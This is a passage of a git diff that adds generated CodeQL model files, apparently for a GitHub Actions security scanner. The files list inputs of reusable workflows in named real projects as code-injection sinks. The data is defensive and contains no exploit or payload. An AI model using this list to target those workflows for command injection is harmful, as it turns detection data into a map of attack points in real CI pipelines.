ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml create 
mode 100644 ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml create mode 100644 
ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml create mode 100644 
ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml create mode 100644 
ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml create mode 100644 
ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml create mode 100644 
ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml new file mode 100644 index 00000000000..2e8a6683a57 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["0xpolygon/polygon-edge/.github/workflows/loadtest.yml", "*", "inputs.scenario", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml new file mode 100644 index 00000000000..55533f12312 --- /dev/null 
+++ b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["8vim/8vim/.github/workflows/publish.yaml", "*", "inputs.version_code", "code-injection", "generated"] + - ["8vim/8vim/.github/workflows/publish.yaml", "*", "inputs.version_name", "code-injection", "generated"] + - ["8vim/8vim/.github/workflows/bump-version.yaml", "*", "inputs.message", "code-injection", "generated"] + - ["8vim/8vim/.github/workflows/build.yaml", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml new file mode 100644 index 00000000000..a14d41a15b9 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "inputs.base-pr-branch", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "inputs.head-pr-branch", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "inputs.reference-files", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "inputs.target-folder", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/codeql-analysis.yml", "*", "inputs.build-command", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/check-dist.yml", "*", "inputs.dist-path", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml new file mode 100644 index 00000000000..0888318ad93 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["adap/flower/.github/workflows/_docker-build.yml", "*", "inputs.namespace-repository", "code-injection", "generated"] + - ["adap/flower/.github/workflows/_docker-build.yml", "*", "inputs.file-dir", "code-injection", "generated"] + - ["adap/flower/.github/workflows/_docker-build.yml", "*", "inputs.build-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml new file mode 100644 index 00000000000..6ea6dcdab70 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "inputs.wheel-tags-to-skip", "code-injection", "generated"] + - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "inputs.qemu", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml new file mode 100644 index 00000000000..2c18a166cc1 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "inputs.wheel-tags-to-skip", "code-injection", "generated"] + - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "inputs.qemu", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml new file mode 100644 index 00000000000..f065947dbdc --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["airbytehq/airbyte/.github/workflows/connector-performance-command.yml", "*", "inputs.connector", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml new file mode 100644 index 00000000000..438525e77e2 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["alphagov/collections/.github/workflows/pact-verify.yml", "*", "inputs.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml new file mode 100644 index 00000000000..ca3111ad03a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["alphagov/frontend/.github/workflows/pact-verify.yml", "*", "inputs.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml new file mode 100644 index 00000000000..1e09e05e8b6 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["alphagov/publishing-api/.github/workflows/pact-verify.yml", "*", "inputs.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml new file mode 100644 index 00000000000..ad061ca714d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml 
@@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "inputs.module", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "inputs.jdk", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "inputs.sql_compatibility", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "inputs.override_config_path", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "inputs.testing_groups", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "inputs.use_indexer", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "inputs.runtime_jdk", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "inputs.it", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "inputs.script", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "inputs.build_jdk", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml new file mode 100644 index 00000000000..3a721a0f2cf --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "inputs.environment", "code-injection", "generated"] + - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "inputs.workflow-caller-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml new file mode 100644 index 00000000000..bdabbb9ab60 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/spark/.github/workflows/build_and_test.yml", "*", "inputs.branch", "code-injection", "generated"] + - ["apache/spark/.github/workflows/build_and_test.yml", "*", "inputs.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml new file mode 100644 index 00000000000..6d8438462a8 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["argilla-io/argilla/.github/workflows/run-python-tests.yml", "*", "inputs.pytestArgs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml new file mode 100644 index 00000000000..6d7bf7af0c2 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "inputs.docker_image_name", "code-injection", "generated"] + - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "inputs.ghcr_image_name", "code-injection", "generated"] + - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "inputs.quay_image_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml new file mode 100644 index 00000000000..b3b198fbf65 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "inputs.docker_image_name", "code-injection", "generated"] + - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "inputs.ghcr_image_name", "code-injection", "generated"] + - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "inputs.quay_image_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml new file mode 100644 index 00000000000..9c3ae9bf194 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["aws-amplify/amplify-ui/.github/workflows/reusable-tagged-publish.yml", "*", "inputs.dist-tag", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml new file mode 100644 index 00000000000..68a85006c6c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["azure/apiops/tools/github_workflows/run-publisher-with-env.yaml", "*", "inputs.API_MANAGEMENT_SERVICE_OUTPUT_FOLDER_PATH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml new file mode 100644 index 00000000000..ee336ee076c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml 
@@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["azure/mlops-templates/.github/workflows/tf-gha-install-terraform.yml", "*", "inputs.terraform_workingdir", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "inputs.parameters-file", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "inputs.workspace_name", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "inputs.resource_group", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "inputs.dockerfile-location", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "inputs.environment_file", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "inputs.workspace_name", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "inputs.resource_group", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml new file mode 100644 index 00000000000..3d3f727923a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml 
@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "inputs.git-user-email", "code-injection", "generated"] + - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "inputs.git-user-name", "code-injection", "generated"] + - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "inputs.track", "code-injection", "generated"] + - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "inputs.package-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml new file mode 100644 index 00000000000..f18d1e4c50a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "inputs.git-user-email", "code-injection", "generated"] + - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "inputs.git-user-name", "code-injection", "generated"] + - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "inputs.track", "code-injection", "generated"] + - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "inputs.package-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml new file mode 100644 index 00000000000..21db2585a5e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "inputs.shell", "code-injection", "generated"] + - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "inputs.environment", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml new file mode 100644 index 00000000000..3f263608c21 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bdunderscore/modular-avatar/.github/workflows/build-test-docs.yml", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml new file mode 100644 index 00000000000..017d0bc89f5 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["benc-uk/workflow-dispatch/.github/workflows/echo-3.yaml", "*", "inputs.message", "code-injection", "generated"] \ No newline at end of file diff 